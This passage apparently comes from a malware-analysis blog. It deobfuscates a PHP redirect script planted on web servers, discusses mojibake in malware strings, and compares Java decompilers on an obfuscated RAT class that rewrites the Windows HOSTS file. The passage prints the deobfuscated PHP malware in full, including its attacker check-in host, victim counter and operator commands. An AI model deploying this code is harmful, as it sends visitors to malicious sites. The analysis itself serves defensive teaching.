And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

import base64

script = """
<<script>>
"""

functions = []
strings = []

# Split the script into its three segments (functions, strings, code).
sections = script.split("<?")
function_section = sections[1]
string_section = sections[2]
code = "<?" + sections[3]

# Parse through each value, separated by the base64_decode call.
for entry in function_section.split("base64_decode"):
    # Skip the initial entry as it contains no value.
    if "GLOBALS" in entry:
        continue
    # Remove the string concatenations
    entry = entry.replace("' .'", "")
    # Split on single quote to get the Base64 value contained within the quotes.
    function = entry.split("'")[1]
    # Append new function name into array
    functions.append(base64.b64decode(function))

for entry in string_section.split(","):
    entry = entry.split("'")[1]
    strings.append(base64.b64decode(entry))

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines = code.split("$GLOBALS['_584730172_']")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    # Ensure the index call, [x], is in the string before going on.
    if not "[" in line:
        continue
    # Extract the index number, pull the function from the array.
    codenum = line.split("[")[1].split("]")[0]
    func = functions[int(codenum)]
    # Recreate the array string and replace it in the code.
    s = "$GLOBALS['_584730172_'][%s]" % codenum
    code = code.replace(s, func)

# Now start replacing strings with true values.
code_lines = code.split("_1348942592")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    if not "(" in line:
        continue
    codenum = line.split("(")[1].split(")")[0]
    string = strings[int(codenum)]
    s = "_1348942592(%s)" % codenum
    code = code.replace(s, "'" + string + "'")

# Print the final code.
print code

The resulting code has another slight level of obfuscation: no carriage returns or spacing. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. This results in the original code which is much easier to analyze:


<?php
error_reporting(round(0));
set_time_limit(round(0));
$_0='http://gayleecher.com:81';

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){
define('ROOT',dirname(__FILE__).'/');
define('LOG',ROOT.'ololo.txt');
@unlink(LOG);

if(!file_exists(LOG)){
@touch(LOG);

if(is_writable(LOG)ANDtrim(file_get_contents($_0.'/iframe.txt'))=='test'){
@unlink(LOG);
echo'work';
}else{
echo'NO WORK, NOT GET URL';
}
}
else{
echo'NO WORK, NOT WRITIBLE';
}
exit;
}

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){
$_1=file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
echo$_1;
exit;
}

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){
if(unlink($_SERVER['SCRIPT_FILENAME'].'.count')){
echo'Null count ok';
}else{
echo'ERROR null count((';
}
exit;
}


if(!empty($_SERVER['HTTP_USER_AGENT'])){
$_2=array('MSIE','Firefox','Opera');
$_3=array('Windows');

if(preg_match('/'.implode('|',$_2).'/i',$_SERVER['HTTP_USER_AGENT'])){
if(preg_match('/'.implode('|',$_3).'/i',$_SERVER['HTTP_USER_AGENT'])){
$_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
if($_4==''or$_4==false)$_4=round(0);
$_5=@fopen($_SERVER['SCRIPT_FILENAME'].'.count','w');
@flock($_5,LOCK_EX);
@fputs($_5,$_4+round(0+1));
@flock($_5,LOCK_UN);
@fclose($_5);
$_6=$_0.'/iframe2.txt';
$_7=round(0+300);
$_8='http://ya.ru/';

if (!$_6) exit();
$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

if($_9['last']<time()-$_7){
if($_9['url']=file_get_contents($_6)){
$_9['last']=time();
$_10=fopen('settings.json','w');
flock($_10,LOCK_EX);
fputs($_10,serialize($_9));
flock($_10,LOCK_UN);
fclose($_10);
}
}
$_11 = $_9['url'] ? $_9['url'] : $_8;
if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';
header("Location: $_11");
exit;
}
}
}
header('HTTP/1.1 404 Not Found');
?>

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI values.

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. This section looks for a file named "ololo.txt" in the same directory as the malicious code and, if found, deletes it (unlink()). If this doesn't work, it displays "NO WORK, NOT WRITABLE" in the web session. This file exists solely for the code to determine if it has write permissions to the folder via the web. It also ensures that it can browse to the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and ensuring that this file contains the text "test".

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it will retrieve the code's current file name, append ".count" to the end of the name, and determine if that file exists in the current web folder. For example, a.php would look for a.php.count. If it exists, the contents will be displayed in the web session.

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.

Lacking any submitted values, the code performs its default routine. This begins by ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera, based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123

Afterward is a line that would confuse many not familiar with ternary logic commands:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one set of data; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which takes raw data and forms it into logical arrays) and place the resulting arrays into $_9. If "settings.json" does not exist, then create a new array with a "url" field that contains $_8 ("http://ya.ru").

The "url" field in this array is then set to the contents of the iframe2.txt file above, and the "last" field set to the current date and time as an epoch value. The values are then written to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
$_7=round(0+300);
if($_9['last']<time()-$_7){

This code sets $_7 to 300, with the round() wrapper being cruft code that can be ignored. The script then checks to see if the "last" visit time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in again to acquire the latest URL to redirect to.
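Restated outside of PHP, the check-in logic works roughly like the following Python sketch (an illustration of the behavior, not the malware's own code):

import time

CHECK_INTERVAL = 300   # seconds, from round(0+300)

def get_redirect_url(settings, fetch_iframe2, default_url='http://ya.ru/'):
    # Only re-fetch iframe2.txt if the cached copy is older than 5 minutes
    if settings.get('last', 0) < time.time() - CHECK_INTERVAL:
        new_url = fetch_iframe2()
        if new_url:
            settings['url'] = new_url
            settings['last'] = time.time()
    return settings.get('url') or default_url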

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru". As an additional check, the sample then ensures that the URL begins with the text "http". If not, it prepends it to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';

The point to this entire script comes at the very end:

header("Location: $_11");

This is a slightly obscure PHP call that appends a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field used to redirect the client to a new web site.

So let's sit back and take in what we know.

This is obfuscated PHP code that sits on a web server. When visited by a home user, the code queries gayleecher.com to retrieve a redirect URL. It saves this URL to a local file named "settings.json" and then redirects the home user to it. All the while, a counter is saved in the background that logs how many home users have been redirected. The actor can query this information by passing certain arguments to see how many total users were redirected.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked about, this is like Sudoku: a relaxing yet challenging exercise that more people should learn :)

Mojibaked Malware: Reading Strings Like Tarot Cards

One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers, in other contexts) and decoy documents requires being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII occupies the byte values 0-127, which fit within one byte of storage (the single-byte code pages extend this through 255). UTF-8 extends upon this by using a single byte where possible, but also allowing variable-length, multi-byte sequences to represent characters outside that range. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.
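That guess-and-check habit is easy enough to script. A minimal sketch that throws a handful of common code pages at an unknown byte string (the bytes below are the UTF-8 form of the Chinese folder name from the path example above) looks like:

mystery = b'\xe6\xa8\xbf\xe9\xb1\xbc'   # unknown bytes pulled from a sample

for codec in ('utf-8', 'gb2312', 'big5', 'shift_jis', 'cp1251', 'iso8859_2'):
    try:
        print('%-10s %s' % (codec, mystery.decode(codec)))
    except UnicodeDecodeError:
        print('%-10s <decode failed>' % codec)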



Many times unknown data is found directly in the middle of known text, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.
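When you need to hunt for these in bulk across a whole binary, where 'strings' falls short, one workaround is to search for valid UTF-8 multi-byte sequences yourself. A quick sketch (the file name is supplied on the command line) might be:

import re
import sys

# Printable ASCII or valid UTF-8 two/three/four-byte sequences, four or more in a row
UTF8_RUN = re.compile(
    br'(?:[\x20-\x7e]'
    br'|[\xc2-\xdf][\x80-\xbf]'
    br'|[\xe0-\xef][\x80-\xbf]{2}'
    br'|[\xf0-\xf4][\x80-\xbf]{3}){4,}')

data = open(sys.argv[1], 'rb').read()
for match in UTF8_RUN.finditer(data):
    try:
        print(match.group().decode('utf-8'))
    except UnicodeDecodeError:
        pass   # false hit; skip it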

For graphical applications it's a bit more difficult. Take, for instance, these series of texts from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually by using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application features virtually no entries at all: just a string of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known (yet surprisingly widespread) Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command-line execution, but requires you to know a specific four-digit code, based on Microsoft's Locale IDs, that is relatively unknown to outsiders. For instance, Simplified Chinese is specified as Locale ID 0804 (the hexadecimal form of the more widely quoted decimal 2052).

To simplify the process, I threw together a quick script over the weekend that provided the full selection of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script from an account with administrative access. From there, you can simply right-click on any executable and select "Execute with AppLocale". The application should then show up in its native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You Want Coffee with That Mojibake?: http://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18  Slide Deck (PDF)  |  White Paper
Russian Post Office fixes mojibake on the fly: http://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

Malware Analysis: The State of Java Reversing Tools

In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It is usually with certainty that any home-user infection with malware such as Zeus, Citadel, Carberp, or ZeroAccess originated through a Java vulnerability and exploit. In typical crimeware (banking/financial theft malware) incidents, one group specializes in the backend malware (e.g. Zeus) while outsourcing the infection and entrenchment to a second group that creates exploit software like BlackHole, Neosploit, and Fiesta.

In many incident responses, I've seen analysts gloss over the Java infection vector as just an endnote. Once they see the final-stage malware on the system, they write off the Java component as just a downloader without any real analysis. This creates issues for the times when the Java exploit only partially succeeds, resulting in malicious Java JAR files on a system but no Trojan or malware.

Why did it fail? Was the system properly patched to prevent a full infection? Was there a permission setting that stopped the downloader in its tracks? These are the questions that typically force an analyst to begin analyzing Java malware.

I've discussed Java quite a bit on this blog in the past. My Java IDX cache file parser was made for the purpose of identifying files downloaded via Java, be they Windows executables or additional Java JAR files. In that same post I analyzed Java from a Fiesta exploit kit that installed a ZeroAccess trojan onto an analyzed system.

Though Java is not my forte, I've had to face it enough to find that there are many weaknesses and gaps in the tools used for analysis. What I found is that most analysts have been using the same, outdated tools in every case. If a tool fails, they just move on and don't finish their analysis. All the while, new applications are being released that are worthy of note. I felt it worthwhile to do an annual check-up of the state of analysis tools to show what is available and what weaknesses each holds. There have been similar efforts by others in the past, with the most recent I've found being one from 2010 on CoffeeBreaks, by Jerome.


This post was intended to be much larger and in-depth, delving into how each analysis tool manages decompilation and why they fail, but due to time and resources it was cut short.

The Setup

For this comparison I will be using code from a Java RAT that is in active development. Due to this active development, I will not name the RAT nor provide any files for download.

The malware used is obfuscated by a well-known Java obfuscation tool named Zelix KlassMaster (ZKM). ZKM has been discussed widely in the industry for years and I gave a presentation on how to identify and reverse its string encryption at a NoVA Hackers! (NoVAH!) meeting in May of 2012.

Due to this obfuscation, we will be matrixing the results of the decompilers against two well-known Java deobfuscators: JMD and JDO.

As seems to be common with Java analysis tools, many of those discussed here are no longer in development and have been abandoned. However, in many cases, they still work for a majority of malicious samples.

Deobfuscators:
Deobfuscators work by detecting known obfuscation methods, such as renamed variables, classes, and functions, as well as basic string encoding. While many of these methods are specific to known obfuscators, generic deobfuscation can be performed by searching for a routine that runs against encoded strings, then calling that routine externally against the strings.

JMD is one open-source deobfuscator, written in Java, but also available as a .NET 2.0 (64-bit d/l) executable. It runs directly against a JAR file and produces a deobfuscated JAR as a result. It provides the following deobfuscation methods:
  • Allatori
  • DashO
  • Generic string encoding
  • JShrink
  • SmokeScreen
  • Zelix KlassMaster (ZKM)

JDO (Java DeObfuscator) is open-source Java as well, and is provided as a .NET 2.0 executable. Unlike JMD, it will only operate against a Java class file. This requires you to manually unzip a JAR file, then run JDO against each individual class file. It will attempt to automatically detect and deobfuscate data through generic means.

Decompilers:
JD-GUI is probably the most widely used decompiler. It features a well-thought out GUI as well as the ability to parse entire JAR files. However, its current hosting site is unavailable, though the site is mirrored elsewhere. For updates, refer to the Twitter page of Emmanuel Dupuy.

The various forms of JD-GUI
For the purpose of this post, the latest version of JD-GUI was used. However, this version may lack the functionality of other versions of "JD". Recently, a greater deal of development has been performed by the JD-GUI developer on JD-Core / JD-IntelliJ.

JAD is a free decompiler, though one that has been discontinued for many years, and as such has many problems with newer iterations of the Java Development Kit (JDK). Its original web domain is gone, and the project is now hosted elsewhere. It's a basic, command-line tool that has been used as the backend to multiple other Java decompilers.

FernFlower was a free decompiler that appeared around 2009 and was unique for being a web-based decompiler. In 2011, an offline JAR file was made available, and the website taken down shortly after. It's currently used as the backend to many commercial decompilers, such as AndroChef and DJ Java Decompiler. Notably, it's currently available bundled in with the Minecraft Coder Pack.

Procyon is a recently released, open-source decompiler. It is currently in active development and, while a command-line tool, does have two GUI front-ends available: Luyten and SecureTeam's Decompiler. Procyon is available on Bitbucket.

Other decompilers that were not included in the scope of this post:
CFR
JReversePro
Krakatau - Python-based decompiler

Disassemblers:
As reversers know, decompilation is an immature science. Certain liberties are taken to assume and guess what code is doing in order to make readable source. The most accurate method is to simply view the raw data itself as compiled Java bytecode. For those situations, reJ provides an excellent GUI front end, and the ability to modify code on-the-fly.

Eclipse plugins
Some decompilers have Eclipse IDE plugins available. Eclipse is currently the prominent environment for Java development, and such plugins allow for code to be reversed directly into a new project for debugging and analysis.


Test 1: Simple file writing function.

The first test will be against an obfuscated class function that allows the RAT to save network-transmitted data to the local Windows HOSTS file to override DNS resolutions.

JD-GUI (raw class file)

import java.io.FileWriter;

public class ec extends u
{
  private static final String[] z;

  public void b(String paramString)
  {
    int i = c.db; String str = s.b();
    try { if (i != 0) break label140; if (b.a() != b.f) break label128; } catch (Exception localException2) { throw localException2; }
    try {
      FileWriter localFileWriter = new FileWriter(System.getenv(z[4]) + z[2]);
      localFileWriter.write(str);
      localFileWriter.close();
      s.b(z[1]);
      s.b(""); } catch (Exception localException1) {
    } try {
      s.b(z[1]);
      s.b(z[3] + localException1.getMessage());

      if (i == 0) return;
      label128: s.b(z[1]); } catch (Exception localException3) { throw localException3; }
    label140: s.b(z[0]);
  }

From this analysis, we have little to work with. We see the java.io.FileWriter class in use, so we know that file activity is taking place, but all strings are replaced with array lookups of z[#]. Let's attempt this again after running the class file through a deobfuscator.

JD-GUI (JDO Deobfuscated)

import java.io.FileWriter;

public class Class_ec extends u
{
  private static final String[] var_3a2;

  public void sub_3ed(String paramString)
  {
    int i = c.db; String str = s.b();
    try { if (i != 0) break label140; if (b.a() != b.f) break label128; } catch (Exception localException2) { throw localException2; }
    try {
      FileWriter localFileWriter = new FileWriter(System.getenv(var_3a2[4]) + var_3a2[2]);
      localFileWriter.write(str);
      localFileWriter.close();
      s.b(var_3a2[1]);
      s.b(""); } catch (Exception localException1) {
    } try {
      s.b(var_3a2[1]);
      s.b(var_3a2[3] + localException1.getMessage());

      if (i == 0) return;
      label128: s.b(var_3a2[1]); } catch (Exception localException3) { throw localException3; }
    label140: s.b(var_3a2[0]);
  }

  static
  {
    // Byte code:
    //   0: iconst_5
    //   1: anewarray 13 java/lang/String
    //   4: dup
    //   5: iconst_0
    //   6: ldc 4
    ... Reduced for brevity ...
    //   156: invokespecial 97 java/lang/String:<init> ([C)V
    //   159: invokevirtual 100 java/lang/String:intern ()Ljava/lang/String;
    //   162: swap
    //   163: pop
    //   164: swap
    //   165: tableswitch default:+-152 -> 13, 0:+-143->22, 1:+-134->31, 2:+-125->40, 3:+-116->49
  }
}

Well, that was awkward. JDO did attempt to rename the string array from 'z' to 'var_3a2', but its edits exposed ZKM's string decryption function, which JD-GUI could not decompile and instead displays as disassembled bytecode. Oddly, JD-GUI did not show this function at all on the raw class file. Either way, there is nothing usable here. Similar results were found when pairing JDO with other decompilers, so JDO was not used further in this post.

JD-GUI (JMD Deobfuscated)

import java.io.FileWriter;

public class ec extends u
{
  private static final String[] z;

  public void b(String arg0)
  {
    String str = s.b();
    try { if (b.a() != b.f) break label111; } catch (Exception localException2) { throw localException2; }
    try {
      FileWriter localFileWriter = new FileWriter(System.getenv("SystemDrive") + "\\Windows\\System32\\drivers\\etc\\hosts");
      localFileWriter.write(str);
      localFileWriter.close();
      s.b("HOSTANSW");
      s.b(""); } catch (Exception localException1) {
    } try {
      s.b("HOSTANSW");
      s.b("ERR: " + localException1.getMessage()); return;

      label111: s.b("HOSTANSW"); } catch (Exception localException3) { throw localException3; }
    s.b("Needs to be windows");
  }
}

Well, our work here is done! Based on this output we see the Java code resolving the SystemDrive environment variable (typically C:) and appending the hardcoded path to the HOSTS file. It writes a string returned from class 's' function 'b' (s.b()), a function responsible for network communications. The "HOSTANSW" strings are simply transmitted back to the C2, along with the "ERR: " message if an error is encountered.

In all, JD-GUI combined with JMD was able to give us a "full" analysis of this one class file. Let's try other decompilers.

Procyon (raw class file)

import java.io.*;

public class ec extends u
{
  private static final String[] z;

  public void b(final String s) {
    final int db = c.db;
    final String b = s.b();
    Label_0140: {
      Label_0128: {
        try {
          if (db != 0) {
            break Label_0140;
          }
          if (b.a() != b.f) {
            break Label_0128;
          }
        }
        catch (Exception ex) {
          throw ex;
        }
        try {
          final FileWriter fileWriter = new FileWriter(System.getenv(ec.z[4]) + ec.z[2]);
          fileWriter.write(b);
          fileWriter.close();
          s.b(ec.z[1]);
          s.b("");
        }
        catch (Exception fileWriter) {
          s.b(ec.z[1]);
          final FileWriter fileWriter;
          s.b(new StringBuilder(ec.z[3]).append(((Throwable)fileWriter).getMessage()).toString());
          if (db == 0) {
            return;
          }
          s.b(ec.z[1]);
          s.b(ec.z[0]);
          final Object o;
          throw o;
        }
      }
    }
  }

  static {
    //
    // This method could not be decompiled.
    //
    // Original Bytecode:
    //
    //   0: iconst_5
    //   1: anewarray Ljava/lang/String;
    //   4: dup
    //   5: iconst_0
    //   6: ldc "_8>f 1)4\" t},k u2,q"
    ... Reduced for brevity ...
    //   165: tableswitch {
    //     0: 22
    //     1: 31
    //     2: 40
    //     3: 49
    //     default: 13
    //   }
    //   196: return
    //
    // The error that occurred was:
    //
    // java.lang.IllegalStateException: Inconsistent stack size at #0053.
    //   at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:1104)
    ... Reduced for brevity ...
    throw new IllegalStateException("An error occurred while decompiling this method.");
  }
}

Interesting results there. Note that Procyon threw an exception at the end for an "Inconsistent stack size". Regardless, the main method decompiled fine. It also recognized ZKM's string decryption routine but could only provide disassembled code for it. The decompiled code is almost identical to that produced by JD-GUI but is presented in a much more structured form. While JD-GUI attempts to group conditions together and compact the function braces ({}), Procyon gives a more formal, albeit larger, output. Even its disassembled output is more structured, with liberal line breaks.

Let's now run Procyon with a deobfuscated class file:

Procyon (JMD Deobfuscated)

import java.io.*;

public class ec extends u
{
  private static final String[] z;

  public void b(final String arg0) {
    final String b = s.b();
    Label_0111: {
      try {
        if (b.a() != b.f) {
          break Label_0111;
        }
      }
      catch (Exception ex) {
        throw ex;
      }
      try {
        final FileWriter fileWriter = new FileWriter(System.getenv("SystemDrive") + "\\Windows\\System32\\drivers\\etc\\hosts");
        fileWriter.write(b);
        fileWriter.close();
        s.b("HOSTANSW");
        s.b("");
        return;
      }
      catch (Exception fileWriter) {
        s.b("HOSTANSW");
        final FileWriter fileWriter;
        s.b("ERR: " + ((Throwable)fileWriter).getMessage());
        return;
      }
      try {
        s.b("HOSTANSW");
      }
      catch (Exception ex2) {
        throw ex2;
      }
    }

    s.b("Needs to be windows");
  }
}

Similar to JD-GUI, we're able to get a clean decompiled view of the file. The code produced by the two is nearly identical, with the main difference being Procyon's more formal structuring of the conditions.

JAD (raw class file)

JAD is commonly the backup to JD-GUI, but it is a much more dated model for decompilation and disassembly. One of my favorite features of JAD, though, is that when it does fail to decompile, its output is a good mixture of the two. It disassembles, but attempts to put logic into the disassembly instead of producing a blind dump like JD-GUI and Procyon:


import java.io.FileWriter;

public class ec extends u
{

  public ec()
  {
  }

  public void b(String s1)
  {
    String s2;
    int i;
    i = c.db;
    s2 = s.b();
    try
    {
      label0:
      {
        if (i != 0)
          break MISSING_BLOCK_LABEL_140;
        if (b.a() != b.f)
          break MISSING_BLOCK_LABEL_128;
        break label0;
      }
    }
    catch (Exception _ex) { }
    FileWriter filewriter = new FileWriter((new StringBuilder(String.valueOf(System.getenv(z[4])))).append(z[2]).toString());
    filewriter.write(s2);
    filewriter.close();
    s.b(z[1]);
    s.b("");
    break MISSING_BLOCK_LABEL_148;
    Exception exception;
    exception;
    s.b(z[1]);
    s.b((new StringBuilder(z[3])).append(exception.getMessage()).toString());
    if (i == 0)
      break MISSING_BLOCK_LABEL_148;
    s.b(z[1]);
    break MISSING_BLOCK_LABEL_140;
    throw;
    s.b(z[0]);
  }

  private static final String z[];

  static
  {
    String as[] = new String[5];
    as;
    as;
    0;
    "_8>f\0071)4\"\026t},k\032u2,q";
    -1;
    goto _L1
_L7:
    JVMINSTR aastore;
    JVMINSTR dup;
    true;
    "Y\022\bV5_\016\f";
    false;
    goto _L1
_L8:
    JVMINSTR aastore;
    JVMINSTR dup;
    2;
    "M\n2l\020~*(^'h./g\031\"o\007f\006x+>p\007M8/a(y2(v\007";
    true;
    goto _L1
_L9:
    JVMINSTR aastore;
    JVMINSTR dup;
    3;
    "T\017\t8T";
    2;
    goto _L1
_L10:
    JVMINSTR aastore;
    JVMINSTR dup;
    4;
    "B$(v\021|\031)k\002t";
    3;
    goto _L1
    ... Reduced for brevity ...
    JVMINSTR new #13 <Class String>;
    JVMINSTR dup_x1;
    JVMINSTR swap;
    String();
    intern();
    JVMINSTR swap;
    JVMINSTR pop;
    JVMINSTR swap;
    JVMINSTR tableswitch 0 3: default 13
    //   0 22
    //   1 31
    //   2 40
    //   3 49;
    goto _L7 _L8 _L9 _L10 _L11
  }
}

JAD's decompiler does a fairly decent job, but differs in how it handles exception handling within the code. Let's see how it operates on deobfuscated classes:

JAD (JMD Deobfuscated)


import java.io.FileWriter;

public class ec extends u
{

  public ec()
  {
  }

  public void b(String arg0)
  {
    String s1;
    s1 = s.b();
    try
    {
      label0:
      {
        if (b.a() != b.f)
          break MISSING_BLOCK_LABEL_111;
        break label0;
      }
    }
    catch (Exception _ex) { }
    FileWriter filewriter = new FileWriter((new StringBuilder(String.valueOf(System.getenv("SystemDrive")))).append("\\Windows\\System32\\drivers\\etc\\hosts").toString());
    filewriter.write(s1);
    filewriter.close();
    s.b("HOSTANSW");
    s.b("");
    break MISSING_BLOCK_LABEL_129;
    Exception exception;
    exception;
    s.b("HOSTANSW");
    s.b((new StringBuilder("ERR: ")).append(exception.getMessage()).toString());
    break MISSING_BLOCK_LABEL_129;
    s.b("HOSTANSW");
    break MISSING_BLOCK_LABEL_122;
    throw;
    s.b("Needs to be windows");
  }

  private static final String z[];

}

Here we see similar results to what the other tools found. But, as mentioned earlier, the exception handling is very confusing. There are breaks and exceptions inline with functional code. Later conditional sections, such as ensuring that the system is running Microsoft Windows, are ignored and the code is shown as one continuous series of instructions. All in all, it does give us some of the source code in a somewhat reasonable facsimile of the original. While excellent as a backup if other tools fail, I wouldn't rely upon it for my primary analysis.

What about FernFlower?

FernFlower was a well-known and trusted decompiler years ago. Like most decompilers, it fell off the scene silently. The first version was web-based, requiring you to upload your class files for analysis. Later versions were compiled into an offline JAR. The FernFlower engine is currently used as the backend for the commercial (shareware) products DJ Java Decompiler and AndroChef. While competent tools that have built upon FernFlower's capabilities, they are generally just commercial GUIs for it.

Additionally, FernFlower alone failed horribly in all of the tests here. Astonishingly, when confronted with the raw class file, it was unable to decompile or disassemble the main HOSTS writing function. However, it did decompile ZKM's string decryption routine, the exact opposite of what we need:


public class ec extends u {

  private static final String[] z;

  public void b(String param1) {
    // $FF: Couldn't be decompiled
  }

  static {
    String[] var10000 = new String[5];
    String[] var10001 = var10000;
    byte var10002 = 0;
    String var10003 = "_8>f 1)4\" t},k u2,q";
    byte var10004 = -1;

    while(true) {
      char[] var5;
      label38: {
        char[] var2 = var10003.toCharArray();
        int var10006 = var2.length;
        int var0 = 0;
        var5 = var2;
        int var6 = var10006;
        if (var10006 > 1) {
          var5 = var2;
          var6 = var10006;
          if (var10006 <= var0) {
            break label38;
          }
        }

        do {
          char[] var8 = var5;
          int var10007 = var0;

          while(true) {
            char var10008 = var8[var10007];
            byte var10009;
            switch(var0 % 5) {
            case 0:
              var10009 = 17;
              break;
            case 1:
              var10009 = 93;
              break;
            case 2:
              var10009 = 91;
              break;
            case 3:
              var10009 = 2;
              break;
            default:
              var10009 = 116;
            }

            var8[var10007] = (char)(var10008 ^ var10009);
            ++var0;
            if (var6 != 0) {
              break;
            }

            var10007 = var6;
            var8 = var5;
          }
        } while(var6 > var0);
      }

      String var4 = (new String(var5)).intern();
      switch(var10004) {
      case 0:
        var10001[var10002] = var4;
        var10001 = var10000;
        var10002 = 2;
        var10003 = "M\n2l ~*(^\'h./g \"o f x+>p M8/a(y2(v ";
        var10004 = 1;
        break;
      case 1:
        var10001[var10002] = var4;
        var10001 = var10000;
        var10002 = 3;
        var10003 = "T \t8T";
        var10004 = 2;
        break;
      case 2:
        var10001[var10002] = var4;
        var10001 = var10000;
        var10002 = 4;
        var10003 = "B$(v | )k t";
        var10004 = 3;
        break;
      case 3:
        var10001[var10002] = var4;
        z = var10000;
        return;
      default:
        var10001[var10002] = var4;
        var10001 = var10000;
        var10002 = 1;
        var10003 = "Y \bV5_ \f";
        var10004 = 0;
      }
    }
  }
}
